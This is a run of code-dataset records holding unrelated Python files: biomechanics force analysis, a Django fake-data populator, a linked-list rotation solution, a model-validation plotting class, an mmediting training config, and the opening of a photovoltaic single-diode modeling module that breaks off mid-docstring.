0; #will write to spreadsheet if 1 entered\n\n# Read in balance file\nfPath = 'C:/Users/Daniel.Feeney/Dropbox (Boa)/EnduranceProtocolWork/TibiaForceData/'\nentries = os.listdir(fPath)\n\n# list of functions \ndef findLandings(force):\n \"\"\"\n The purpose of this function is to determine the landings (foot contacts)\n events on the force plate when the filtered vertical ground reaction force\n exceeds the force threshold\n\n Parameters\n ----------\n force : list\n vertical ground reaction force. \n\n Returns\n -------\n lic : list\n indices of the landings (foot contacts)\n\n \"\"\"\n lic = []\n for step in range(len(force)-1):\n if force[step] == 0 and force[step + 1] >= fThresh:\n lic.append(step)\n return lic\n\ndef findTakeoffs(force):\n \"\"\"\n Find takeoff from FP when force goes from above thresh to 0\n\n Parameters\n ----------\n force : list\n vertical ground reaction force\n\n Returns\n -------\n lto : list\n indices of the take-offs\n\n \"\"\"\n lto = []\n for step in range(len(force)-1):\n if force[step] >= fThresh and force[step + 1] == 0:\n lto.append(step + 1)\n return lto\n \n\n\n#Preallocation\ntibForcePk = []\ntibImpulse = []\nsName = []\ntmpConfig = []\ntimeP = []\n# need to add force vector to this because the ankle force \n## loop through the selected files\nfor file in entries:\n try:\n \n fName = file #Load one file at a time\n \n dat = pd.read_csv(fPath+fName,sep='\\t', skiprows = 8, header = 0)\n #Parse file name into subject and configuration \n subName = fName.split(sep = \"_\")[0]\n config = fName.split(sep = \"_\")[2]\n timePoint = fName.split(sep = \"_\")[3]\n \n # Filter force\n ankleForce = dat.LeftAnkleForce * -1\n ankleForce[ankleForce= 2900]\n\n\n#plt.plot(dat.LAnkleMomenty, label = 'Ankle Moment')\n#plt.plot(ankleForce, label = 'Ankle Force')\n#plt.legend()\n#\n#plt.plot(dat.TibialForce, label = 'Tibial Force')\n#plt.plot(ankleForce, label = 'Ankle Force')\n#plt.plot(dat.PFForce, label = 'Plantarflexor Force')\n#plt.legend()\n# \n#f, axes = plt.subplots(1,4)\n#sns.boxplot(y='peakBrake', x='Sub', hue=\"Config\",\n# data=outcomes, \n# palette=\"colorblind\", ax=axes[0])\n#\n#sns.boxplot(y='VLR', x='Sub', hue = \"Config\", \n# data=outcomes, \n# palette=\"colorblind\", ax=axes[1])\n#\n#sns.boxplot(y='brakeImpulse', x='Sub', hue = \"Config\", \n# data=cleanedOutcomes, \n# palette=\"colorblind\", ax=axes[2])\n#\n#sns.boxplot(y='NL', x='Sub', hue = \"Config\", \n# data=cleanedOutcomes, \n# palette=\"colorblind\", ax=axes[3])\n#plt.tight_layout()\n","sub_path":"Python/Validation_Run_TibiaForce.py","file_name":"Validation_Run_TibiaForce.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"417037307","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'second_proj.settings')\n\nimport django\ndjango.setup()\n\nfrom second_app.models import User\nfrom faker import Faker\n\nfakegen = Faker()\n\ndef populate(n=5):\n for entry in range(n):\n\n # create fake entry\n fake_first = fakegen.first_name()\n fake_last = fakegen.last_name()\n fake_email = fakegen.email()\n\n # create webpage\n user = User.objects.get_or_create(first_name=fake_first,\n last_name=fake_last,\n email=fake_email)[0]\n\n\nif __name__ == \"__main__\":\n print(\"populating script!\")\n populate(20)\n print(\"populating complete\")\n","sub_path":"udemy_django_course/Django-Python-Full-Stack-Web-Devloper-master/second_proj/populate_second_app.py","file_name":"populate_second_app.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186667723","text":"from home.util_base import BaseUtil\n\nfrom home.util_message import MessageUtil\nfrom consult.util_consult_request import ConsultRequestUtil\n\n\nclass PublicObject(BaseUtil):\n def __init__(self, lang):\n super(PublicObject, self).__init__()\n self._util_name = 'Public Object'\n self._form_errors = {}\n self.language = lang\n\n def get_form_errors(self):\n return self._form_errors\n\n #\n #\n #\n #\n #\n\n def new_message(self, info):\n msg_util = MessageUtil()\n if msg_util.new_message(info):\n return True\n else:\n self.add_error_list(msg_util.get_errors())\n self._form_errors = msg_util.get_form_errors()\n return False\n\n def new_consult_request(self, info):\n cr_util = ConsultRequestUtil(self.language)\n if cr_util.new_consult_request(info):\n return True\n else:\n self.add_error_list(cr_util.get_errors())\n self._form_errors = cr_util.get_form_errors()\n return False\n\n\n","sub_path":"home/object_public.py","file_name":"object_public.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293751785","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef array_to_linklist(array: list) -> ListNode:\n if len(array) == 0:\n return None\n head = p = ListNode(array[0])\n for i in range(1, len(array)):\n p.next = ListNode(array[i])\n p = p.next\n return head\n\n\ndef linklist_to_array(head: ListNode) -> list:\n array = []\n if head is None:\n return array\n p = head\n while p:\n array.append(p.val)\n p = p.next\n return array\n\n\nclass Solution:\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\n # solution 1\n # if head is None:\n # return head\n #\n # p, length = head, 0\n # while p:\n # length += 1\n # p = p.next\n #\n # k %= length\n # if k == 0:\n # return head\n #\n # p = head\n # for _ in range(length - k - 1):\n # p = p.next\n #\n # ans, p.next = p.next, None\n #\n # q = ans\n # while q.next:\n # q = q.next\n # q.next = head\n #\n # return ans\n\n # solution 2\n if head is None:\n return head\n\n p, length = head, 1\n while p.next:\n p = p.next\n length += 1\n p.next = head\n\n k %= length\n if k != 0:\n for _ in range(length - k):\n p = p.next\n ans, p.next = p.next, None\n return ans\n\n\ndef test_solution():\n head = array_to_linklist([1, 2, 3, 4, 5])\n head = Solution().rotateRight(head, 2)\n assert linklist_to_array(head) == [4, 5, 1, 2, 3]\n\n head = array_to_linklist([0, 1, 2])\n head = Solution().rotateRight(head, 4)\n assert linklist_to_array(head) == [2, 0, 1]\n","sub_path":"link_list/summary/61_rotate_list.py","file_name":"61_rotate_list.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"428190299","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nfrom scipy import stats\nfrom craftai.time import Time\nfrom datetime import datetime\nimport math\nfrom sklearn.metrics import r2_score, mean_squared_error\n\nclass Validator:\n\n def __init__(self, client, agent):\n self.client = client\n self.agent = client.get_agent(agent['id']) # update to get firstTimestamp and more\n\n def learning_curve(self, train, test, step=None, window=None):\n \"\"\"Compute learning curve and return plot object\"\"\"\n\n if step is None:\n step = self.agent['time_quantum']\n\n MSE_train = self.learning_curve_MSE(dataset=train, step=step)\n\n if test and len(test) > 0:\n MSE_test = self.learning_curve_MSE(dataset=test, step=step)\n else:\n MSE_test = { 'MSE': 0, 'points': [] }\n\n sliding = self.learning_curve_sliding(train=train, test=test, step=step, window=window)\n\n plt = self.plot_learning_curve(train=MSE_train, test=MSE_test, sliding=sliding)\n return plt\n\n def learning_curve_sliding(self, train, test, step=None, window=None):\n \"\"\"Compute the sliding window technique\"\"\"\n\n dataset = sorted(train + test, key=lambda x: x['timestamp'])\n\n if step is None:\n step = self.agent['time_quantum']\n if window is None:\n window = step\n\n if 'timezone' in dataset[0]['diff'].keys():\n tz = dataset[0]['diff']['timezone']\n else:\n tz = '+01:00'\n\n output = self.agent['configuration']['output'][0]\n try:\n first = self.agent['firstTimestamp']\n last = self.agent['lastTimestamp']\n except BaseException as e:\n raise Exception(\"Fail to retreive the first timestamp, contexts haven't been correctly sent.\")\n\n MSE = { 'MSE': 0, 'points': [] }\n\n t = first\n while t <= (last - window):\n\n time = Time(t, tz)\n tree = self.client.get_decision_tree(self.agent['id'], t)\n point = { 'timestamp': t, 'MSE': 0, 'r2_score': 0, 'y_true': [], 'y_pred': [] }\n\n n = 0\n for context in dataset:\n if context['timestamp'] > t + window:\n break\n elif context['timestamp'] <= t:\n continue\n else:\n sample_time = Time(int(context['timestamp']), tz)\n y = context['diff'][output]\n yb = 0\n try:\n yb = self.client.decide(tree, context['diff'], sample_time)[\"decision\"][output]\n except BaseException as e:\n print('error')\n print(e)\n pass\n finally:\n if not (y is None or yb is None or math.isnan(float(y)) or math.isnan(float(yb))):\n point['y_true'].append(y)\n point['y_pred'].append(yb)\n n = n + 1\n\n point['MSE'] = mean_squared_error(point['y_true'], point['y_pred'])\n point['r2_score'] = r2_score(point['y_true'], point['y_pred'])\n\n # Add results only if we had data to compute\n if n > 0: MSE['points'].append(point)\n\n t = t + step\n\n return MSE\n\n def learning_curve_MSE(self, dataset, step=None):\n \"\"\"Compute the error learning curve\"\"\"\n\n if 'timezone' in dataset[0]['diff'].keys():\n tz = dataset[0]['diff']['timezone']\n else:\n tz = '+01:00'\n\n output = self.agent['configuration']['output'][0]\n try:\n first = self.agent['firstTimestamp']\n last = self.agent['lastTimestamp']\n except BaseException as e:\n raise PipelineError(\"Fail to retreive the first timestamp, contexts haven't been correctly sent.\")\n\n dataset = sorted(dataset, key=lambda k: k['timestamp'])\n MSE = { 'MSE': 0, 'points': [] }\n\n t = first\n while t <= last:\n tree_time = Time(t, tz)\n tree = self.client.get_decision_tree(self.agent['id'], t)\n point = { 'timestamp': t, 'MSE': 0, 'r2_score': 0, 'y_true': [], 'y_pred': [] }\n for context in dataset:\n y = context['diff'][output]\n sample_time = Time(int(context['timestamp']), tz)\n yb = 0\n try:\n yb = self.client.decide(tree, context['diff'], sample_time)[\"decision\"][output]\n except BaseException as e:\n print('error')\n print(e)\n pass\n finally:\n if not (y is None or yb is None or math.isnan(float(y)) or math.isnan(float(yb))):\n point['y_true'].append(y)\n point['y_pred'].append(yb)\n\n point['MSE'] = mean_squared_error(point['y_true'], point['y_pred'])\n point['r2_score'] = r2_score(point['y_true'], point['y_pred'])\n MSE['points'].append(point)\n t = t + step\n\n return MSE\n\n def plot_learning_curve(self, train, test, sliding=None):\n \"\"\"Return a matplotlib object with the validation curves\"\"\"\n\n train_x = [datetime.fromtimestamp(x['timestamp']) for x in train['points']]\n train_y = [x['MSE'] for x in train['points']]\n train_r2 = [x['r2_score'] for x in train['points']]\n test_x = [datetime.fromtimestamp(x['timestamp']) for x in test['points']]\n test_y = [x['MSE'] for x in test['points']]\n test_r2 = [x['r2_score'] for x in test['points']]\n\n if not (sliding is None):\n sliding_x = [datetime.fromtimestamp(x['timestamp']) for x in sliding['points']]\n sliding_y = [x['r2_score'] for x in sliding['points']]\n\n if test_x and len(test_x) > 0:\n t_min = min(min(train_x), min(test_x))\n t_max = max(max(train_x), max(test_x))\n else:\n t_min = min(train_x)\n t_max = max(train_x)\n\n plt.figure()\n gs = gridspec.GridSpec(3, 1)\n\n # Plot MSE\n ax1 = plt.subplot(gs[0,:])\n ax1.set_title('Learning curve (error) - ' + self.agent['id'])\n ax1.set_ylabel('MSE')\n ax1.set_xlim(t_min, t_max)\n\n ax1.plot(train_x, train_y, 'o-', color=\"r\", label=\"Training error\")\n ax1.plot(test_x, test_y, 'o-', color=\"g\", label=\"Test error\")\n plt.legend(loc=\"best\")\n\n # Plot R2\n ax2 = plt.subplot(gs[1,:])\n ax2.set_title('Learning curve (R2 score) - ' + self.agent['id'])\n ax2.set_ylabel('R2')\n ax2.set_ylim([-1,1])\n ax2.set_xlim(t_min, t_max)\n\n ax2.plot(train_x, train_r2, '-', color=\"r\", label=\"Training R2 score\")\n ax2.plot(test_x, test_r2, '-', color=\"g\", label=\"Test R2 score\")\n plt.legend(loc=\"best\")\n\n # Plot the sliding window technique\n if not (sliding is None):\n\n ax3 = plt.subplot(gs[2,:])\n ax3.set_title('Sliding window technique (R2 score) - ' + self.agent['id'])\n ax3.set_ylabel('R2')\n ax3.set_ylim([-1,1])\n ax3.set_xlim(t_min, t_max)\n\n ax3.plot(sliding_x, sliding_y, '-', color=\"g\", label=\"R2 score\")\n plt.legend(loc=\"best\")\n\n # Returning plot object\n return plt\n","sub_path":"src/developerkit/old_validator.py","file_name":"old_validator.py","file_ext":"py","file_size_in_byte":7419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323128781","text":"'''\nInput: a List of integers where every int except one shows up twice\nReturns: an integer\n'''\ndef single_number(arr):\n # sort elements\n arr = sorted(arr)\n # loop over and alternate adding and subtracting each elem to cancel pairs\n result = int()\n for idx,v in enumerate(arr):\n if idx % 2 == 0:\n result += v\n else:\n result -= v\n\n return result\n\n\nif __name__ == '__main__':\n # Use the main function to test your implementation\n # arr = [1, 1, 4, 4, 5, 5, 3, 3, 9, 0, 0]\n arr = [1, 5, 4, 4, 1, 5, 0, 3, 9, 3, 0]\n\n print(f\"The odd-number-out is {single_number(arr)}\")","sub_path":"single_number/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186040203","text":"# model settings\nmodel = dict(\n type='DIM',\n backbone=dict(\n type='SimpleEncoderDecoder',\n encoder=dict(type='VGG16', in_channels=4),\n decoder=dict(type='PlainDecoder')),\n refiner=dict(type='PlainRefiner'),\n pretrained=None,\n loss_alpha=dict(type='CharbonnierLoss', loss_weight=0.5),\n loss_comp=dict(type='CharbonnierCompLoss', loss_weight=0.5),\n loss_refine=dict(type='CharbonnierLoss'))\ntrain_cfg = dict(train_backbone=True, train_refiner=True)\ntest_cfg = dict(refine=True, metrics=['SAD', 'MSE', 'GRAD', 'CONN'])\n\n# dataset settings\ndataset_type = 'AdobeComp1kDataset'\ndata_root = 'data/adobe_composition-1k'\nimg_norm_cfg = dict(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile', key='alpha', flag='grayscale'),\n dict(type='LoadImageFromFile', key='fg'),\n dict(type='LoadImageFromFile', key='bg'),\n dict(type='LoadImageFromFile', key='merged', save_original_img=True),\n dict(\n type='CropAroundUnknown',\n keys=['alpha', 'merged', 'ori_merged', 'fg', 'bg'],\n crop_sizes=[320, 480, 640]),\n dict(type='Flip', keys=['alpha', 'merged', 'ori_merged', 'fg', 'bg']),\n dict(\n type='Resize',\n keys=['alpha', 'merged', 'ori_merged', 'fg', 'bg'],\n scale=(320, 320),\n keep_ratio=False),\n dict(type='GenerateTrimap', kernel_size=(1, 30)),\n dict(\n type='RescaleToZeroOne',\n keys=['merged', 'alpha', 'ori_merged', 'fg', 'bg', 'trimap']),\n dict(type='Normalize', keys=['merged'], **img_norm_cfg),\n dict(\n type='Collect',\n keys=['merged', 'alpha', 'trimap', 'ori_merged', 'fg', 'bg'],\n meta_keys=[]),\n dict(\n type='ImageToTensor',\n keys=['merged', 'alpha', 'trimap', 'ori_merged', 'fg', 'bg']),\n]\ntest_pipeline = [\n dict(\n type='LoadImageFromFile',\n key='alpha',\n flag='grayscale',\n save_original_img=True),\n dict(\n type='LoadImageFromFile',\n key='trimap',\n flag='grayscale',\n save_original_img=True),\n dict(type='LoadImageFromFile', key='merged'),\n dict(type='Pad', keys=['trimap', 'merged'], mode='reflect'),\n dict(type='RescaleToZeroOne', keys=['merged', 'trimap']),\n dict(type='Normalize', keys=['merged'], **img_norm_cfg),\n dict(\n type='Collect',\n keys=['merged', 'trimap'],\n meta_keys=[\n 'merged_path', 'pad', 'merged_ori_shape', 'ori_alpha', 'ori_trimap'\n ]),\n dict(type='ImageToTensor', keys=['merged', 'trimap']),\n]\ndata = dict(\n samples_per_gpu=1,\n workers_per_gpu=4,\n train=dict(\n type=dataset_type,\n ann_file=f'{data_root}/training_list.json',\n data_prefix=data_root,\n pipeline=train_pipeline),\n val=dict(\n type=dataset_type,\n ann_file=f'{data_root}/test_list.json',\n data_prefix=data_root,\n pipeline=test_pipeline),\n test=dict(\n type=dataset_type,\n ann_file=f'{data_root}/test_list.json',\n data_prefix=data_root,\n pipeline=test_pipeline))\n\n# optimizer\noptimizers = dict(type='Adam', lr=0.00001)\n# learning policy\nlr_config = dict(policy='Fixed')\n\n# checkpoint saving\ncheckpoint_config = dict(interval=40000, by_epoch=False)\nevaluation = dict(interval=40000, save_image=False)\nlog_config = dict(\n interval=10,\n hooks=[\n dict(type='TextLoggerHook', by_epoch=False),\n # dict(type='TensorboardLoggerHook'),\n # dict(type='PaviLoggerHook', init_kwargs=dict(project='dim'))\n ])\n\n# runtime settings\ntotal_iters = 1000000\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/dim_finetune'\nload_from = './work_dirs/dim_stage2/latest.pth'\nresume_from = None\nworkflow = [('train', 1)]\n","sub_path":"configs/mattors/dim/dim_stage3_v16_pln_1x1_1000k_comp1k.py","file_name":"dim_stage3_v16_pln_1x1_1000k_comp1k.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"519085411","text":"#!/usr/bin/env python\n\"\"\"IV Swinger PV modeling module\"\"\"\n# pylint: disable=too-many-lines\n#\n###############################################################################\n#\n# IV_Swinger_PV_model.py: IV Swinger PV modeling module\n#\n# Copyright (C) 2020, 2021 Chris Satterlee\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n###############################################################################\n#\n# IV Swinger and IV Swinger 2 are open source hardware and software\n# projects\n#\n# Permission to use the hardware designs is granted under the terms of\n# the TAPR Open Hardware License Version 1.0 (May 25, 2007) -\n# http://www.tapr.org/OHL\n#\n# Permission to use the software is granted under the terms of the GNU\n# GPL v3 as noted above.\n#\n# Current versions of the licensing files, documentation, hardware\n# design files, and software can be found at:\n#\n# https://github.com/csatt/IV_Swinger\n#\n###############################################################################\n#\n# This file contains Python code that models PV modules or cells. It is\n# part of the IV Swinger project, but has no dependencies on other code\n# from that project. Therefore it may be imported and used for other\n# unrelated projects without importing the other IV Swinger modules.\n#\n# The main purpose of this module is to predict the IV curve of a PV\n# module/cell given its datasheet values and the irradiance and cell\n# temperature conditions under which it is operating. When compared to a\n# measured IV curve, this \"reference\" IV curve can be used to evaluate\n# the performance of the PV under test. This modeling is not a trivial\n# task. There are many research papers devoted to the topic. I primarily\n# studied the following papers:\n#\n# Ibrahim, Haider & Anani, Nader. (2017). Variations of PV module\n# parameters with irradiance and temperature. Energy\n# Procedia. 134. 10.1016/j.egypro.2017.09.617.\n#\n# De Soto, W. & Klein, S.A. & Beckman, W.A.. (2006). Improvement and\n# validation of a model for photovoltaic array performance. Solar\n# Energy. 80. 78-88. 10.1016/j.solener.2005.06.010.\n#\n# This code (like most of the research papers) uses the \"single-diode\"\n# circuit model for PV cells. A 2-diode circuit model is slightly more\n# accurate, but makes the mathematics too complex to be justified (and\n# it is bad enough with the single-diode model). The following equation\n# defines the relationship between current and voltage for the\n# single-diode model.\n#\n# I = IL - I0 * [e^((V + I*Rs)/(n*Ns*Vth)) - 1] - (V + I*Rs)/Rsh\n#\n# where:\n# I = output current\n# V = output voltage\n# IL = light current aka photocurrent\n# I0 = diode reverse saturation current\n# Rs = series resistance\n# Rsh = shunt (parallel) resistance\n# n = diode ideality factor\n# Ns = number of series-connected cells\n# Vth = thermal equivalent voltage = kT/q\n# where:\n# k = Boltzmann constant (1.381E-23 J/K)\n# T = cell temperature (K)\n# q = charge of an electron (1.602E-19 C)\n# = 25.7 mV at 25 degrees C (298.15 K)\n#\n# At a given cell temperature, the value (n*Ns*Vth) is constant, which\n# we will name \"A\":\n#\n# I = IL - I0 * [e ^ ((V + I*Rs)/A) - 1] - (V + I*Rs)/Rsh\n#\n# What makes this equation difficult to work with is the fact that the\n# current (I) is on both sides of the equation AND it is in the exponent\n# of e on the right side. This makes it both \"implicit\" and\n# \"transcendental\". Algebra cannot be used to solve for I, given the\n# other values. Instead, numerical methods (such as the Newton-Raphson\n# method) must be used to iteratively search for the solution.\n# Fortunately, the SciPy library provides the tool we need - namely a\n# \"root solver\".\n#\n# The values of the following five parameters need to be determined in\n# order to generate an IV curve:\n#\n# IL, I0, A, Rs, Rsh\n#\n# Their values are dependent on the particular PV module/cell\n# characteristics and also on the irradiance and cell temperature.\n#\n# The datasheet provides the following four values at standard test\n# conditions (aka STC, which are 1000 W/m^2 irradiance and 25 degrees C\n# cell temperature):\n#\n# Voc = open-circuit voltage\n# Isc = short-circuit current\n# Vmp = voltage at maximum power point\n# Imp = current at maximum power point\n#\n# Determining the five parameter values requires simultaneously solving\n# five equations. These five equations are based on information we know\n# about certain points on the curve, namely:\n#\n# Eq 1: I=0 where V=Voc\n# Eq 2: V=0 where I=Isc\n# Eq 3: I=Imp and V=Vmp at the MPP\n# Eq 4: Power is at its peak (i.e. dP/DV=0) at the MPP\n# Eq 5: The reciprocal of the slope at the Isc point is -Rsh\n#\n# The SciPy root solver is also used for solving these simultaneous\n# equations. However, there are cases where this fails to converge. In\n# some such cases using using only the first four equations with a fixed\n# value for Rsh converges and produces a good result. And in some cases,\n# equation #4 must be ignored altogether for the solver to converge. In\n# that case, the result is imperfect because there is a point on the\n# modeled curve that has a higher power than the specified MPP. But the\n# curve does pass through the specified MPP, and the modeled curve is\n# usable for most purposes.\n#\n# To generate the IV curve at STC, the parameters are derived using the\n# STC values from the datasheet. That is nice, but not very useful other\n# than to validate the model since the STC IV curve is generally\n# included in the datasheet anyway. What we really want is to generate\n# the IV curve at non-STC values of irradiance and/or cell temperature.\n#\n# The effect of irradiance is modeled as a scaling of the light current\n# (IL) in proportion to the STC irradiance. It assumes that irradiance\n# does not affect I0, A or Rs. This is fairly accurate except at low\n# irradiance.\n#\n# The effect of cell temperature is determined from the following\n# datasheet values:\n#\n# Isc temperature coefficient (%/K or mA/K)\n# Voc temperature coefficient (%/K or mV/K)\n# MPP temperature coefficient (%/K or W/K)\n#\n# Note that the MPP temperature coefficient specifies a power delta, and\n# does not split out its current and voltage components. We assume that\n# the current component is equal to the Isc temperature coefficient, and\n# the voltage component is derived based on that and the power\n# coefficient.\n#\n# A two-step process is used to generate the IV curve at a given\n# irradiance and cell temperature:\n#\n# Step 1 (account for temperature only):\n# - Calculate temperature-adjusted Isc (@ 1000 W/m^2)\n# - Calculate temperature-adjusted Voc (@ 1000 W/m^2)\n# - Calculate temperature-adjusted Vmp (@ 1000 W/m^2)\n# - Calculate temperature-adjusted Imp (@ 1000 W/m^2)\n# - Use root solver to determine IL, I0, A, Rs and Rsh\n#\n# Step 2 (adjust for irradiance):\n# - scale IL from step 1 by irradiance/STC_irradiance\n# - Use I0, A, Rs and Rsh from step 1\n# - Generate curve using root solver\n#\n# This module also supports a reverse computation, where the measured\n# Voc and Isc are provided and the temperature and/or irradiance are\n# derived.\n#\nimport datetime as dt\nimport csv\nimport os\nimport warnings\nimport numpy as np\nfrom scipy.optimize import root\nfrom scipy import __version__ as scipy_version\n\n#################\n# Constants #\n#################\n# Default property values (can be overridden)\nDEFAULT_I0_GUESSES = [1e-8, 1e-9, 1e-10, 3e-8]\nDEFAULT_RS_GUESSES = [0.1, 0.2, 0.0, 0.6, 0.7, 0.9, 0.5]\nDEFAULT_RSH_GUESSES = [1e15, 100]\nDEFAULT_ERR_THRESH = 0.001\n\n# Other constants\nSTC_IRRAD = 1000.0\nNOC_IRRAD = 800.0\nSTC_T_C = 25.0\nBOLTZMANN_K = 1.38066e-23 # Boltzmann constant (Joules/Kelvin)\nTEMP_K_0_DEG_C = 273.15 # Kelvins at 0 degrees C\nELECTRON_CHG_Q = 1.60218e-19 # electron charge (coulombs)\nIDEALITY_FACTOR_GUESS = 1.0\nCELL_VOC_GUESS = 0.67\nSPEC_FIELDS = [\"PV Name\", \"Voc\", \"Isc\", \"Vmp\", \"Imp\", \"Cells\",\n \"Voc temp coeff\", \"Voc temp coeff units\",\n \"Isc temp coeff\", \"Isc temp coeff units\",\n \"MPP temp coeff\", \"MPP temp coeff units\",\n \"NOCT\"]\nSCIPY_VERSION = scipy_version # for flake8\n\n\n########################\n# Global functions #\n########################\ndef test_i_given_v_and_parms(amps, volts, il_i0_a_rs_rsh):\n \"\"\"Function to test a current value (amps) to determine how close it is\n to satisfying the single-diode equation, given the voltage and\n the five parameter values: IL, I0, A, Rs and Rsh. If the provided\n amps value is perfect, the value returned will be zero. This\n function is used for identifying points on the IV curve (other\n than Isc, MPP and Voc) once the five parameter values are known.\n It is intended to be passed to the SciPy root solver to find the\n current corresponding to a given voltage. The root solver\n repeatedly calls this function using progressively better guesses\n for the current until it has identified a value that produces a\n return value sufficiently close to zero.\n \"\"\"\n il, i0, a, rs, rsh = il_i0_a_rs_rsh\n exp_term = (volts + amps*rs)/a if (volts + amps*rs)/a < 100 else 100\n return il - i0 * np.expm1(exp_term) - (volts + amps*rs)/rsh - amps\n\n\ndef test_voc(voc, il_i0_a_rsh):\n \"\"\"Function to test a Voc value to determine how close it is to\n satisfying the single-diode equation, given the four parameter\n values: IL, I0, A and Rs. If the provided Voc value is perfect\n (given the parameter values), or if the parameter values are\n perfect (given the Voc value), the value returned will be zero.\n In this case, the single-diode equation is simplified by the fact\n that the current is zero at the Voc point. The Rs parameter is\n not relevant since it is multiplied by current in the full\n single-diode equation. This function is used as one of the five\n simultaneous equations (#1) used by the test_parms function to\n determine the parameter values. It is also used for identifying\n the Voc once the parameter values are known. It is intended to\n be passed to the SciPy root solver. The root solver repeatedly\n calls this function using progressively better guesses for the\n inputs until it has identified values that produce a return value\n sufficiently close to zero.\n \"\"\"\n il, i0, a, rsh = il_i0_a_rsh\n voc_exp_term = voc/a if voc/a < 100 else 100 # prevent overflow\n return il - i0 * np.expm1(voc_exp_term) - voc/rsh\n\n\ndef test_isc(isc, il_i0_a_rs_rsh):\n \"\"\"Function to test an Isc value to determine how close it is to\n satisfying the single-diode equation, given the five parameter\n values: IL, I0, A, Rs and Rsh. If the provided Isc value is\n perfect (given the parameter values), or if the parameter values\n are perfect (given the Isc value), the value returned will be\n zero. In this case, the single-diode equation is simplified by\n the fact that the voltage is zero at the Isc point. This function\n is used as one of the five simultaneous equations (#2) used by\n the test_parms function to determine the parameter values. It may\n also be used for identifying the Isc once the parameter values are\n known. It is intended to be passed to the SciPy root solver. The\n root solver repeatedly calls this function using progressively\n better guesses for the inputs until it has identified values that\n produce a return value sufficiently close to zero.\n \"\"\"\n il, i0, a, rs, rsh = il_i0_a_rs_rsh\n isc_exp_term = isc*rs/a if isc*rs/a < 100 else 100 # prevent overflow\n return il - i0 * np.expm1(isc_exp_term) - isc*rs/rsh - isc\n\n\ndef test_eq3(vmp_imp, il_i0_a_rs_rsh):\n \"\"\"Function to test Vmp and Imp values to determine how close they are\n to satisfying the single-diode equation, given the five parameter\n values: IL, I0, A, Rs and Rsh. If the provided Vmp and Imp values\n are perfect (given the parameter values), or if the parameter\n values are perfect (given the Vmp and Imp values), the value\n returned will be zero. This function is used for Equation #3 in\n the test_parms function. Note, that a return value of zero proves\n only that the Vmp, Imp point is on the curve, not that it is the\n point on the curve with the maximum power - that is what Equation\n #4 is for.\n \"\"\"\n vmp, imp = vmp_imp\n eq3_result = test_i_given_v_and_parms(imp, vmp, il_i0_a_rs_rsh)\n return eq3_result\n\n\ndef test_eq4(vmp_imp, i0_a_rs_rsh):\n \"\"\"Function to test Vmp and Imp values to determine if they represent\n the point with the maximum power, given the four parameter\n values: I0, A, Rs and Rsh. If the provided Vmp and Imp values are\n perfect (given the parameter values), or if the parameter values\n are perfect (given the Vmp and Imp values), the values returned\n will be zero. This function is used for Equation #4 in the\n test_parms function.\n \"\"\"\n vmp, imp = vmp_imp\n i0, a, rs, rsh = i0_a_rs_rsh\n mpp_exp_term = (vmp + imp*rs)/a if (vmp + imp*rs)/a < 100 else 100\n eq4_result = (imp - vmp * (i0 * rsh * np.exp(mpp_exp_term) + a) /\n (rsh * (i0 * rs * np.exp(mpp_exp_term) + a) + (rs * a)))\n return eq4_result\n\n\ndef test_mpp(vmp_imp, il_i0_a_rs_rsh):\n \"\"\"Function to test Vmp and Imp with both Equation #3 and Equation\n #4. If both return values are zero, the Vmp and Imp values\n represent the maximum power point of the curve defined by the\n five parameters.\n \"\"\"\n eq3_result = test_eq3(vmp_imp, il_i0_a_rs_rsh)\n eq4_result = test_eq4(vmp_imp, il_i0_a_rs_rsh[1:])\n return [eq3_result, eq4_result]\n\n\ndef test_eq5(rsh, i0_a_rs_isc):\n \"\"\"Function to test Rsh with the I0, A and Rs parameters as well as the\n Isc value to determine if they satisfy the fifth equation, which\n is based on the fact that the slope of the curve at the Isc point\n should be the negative reciprocal of Rsh.\n \"\"\"\n i0, a, rs, isc = i0_a_rs_isc\n mpp_exp_term = (isc*rs)/a if (isc*rs)/a < 100 else 100\n eq5_result = (1/rsh - (i0 * rsh * np.exp(mpp_exp_term) + a) /\n (rsh * (i0 * rs * np.exp(mpp_exp_term) + a) + (rs*a)))\n return eq5_result\n\n\ndef test_parms(il_i0_a_rs_rsh, voc_isc_vmp_imp_ignore_eq4):\n \"\"\"Function to test all five parameter values (IL, I0, A, Rs, and Rsh),\n given the following known values from the curve:\n\n Voc = open-circuit voltage\n Isc = short-circuit current\n Vmp = voltage at maximum power point\n Imp = current at maximum power point\n\n Five equations are required because there are five unknowns to\n solve for:\n\n Eq 1: Single-diode equation with I=0 and V=Voc\n Eq 2: Single-diode equation with I=Isc and V=0\n Eq 3: Single-diode equation with 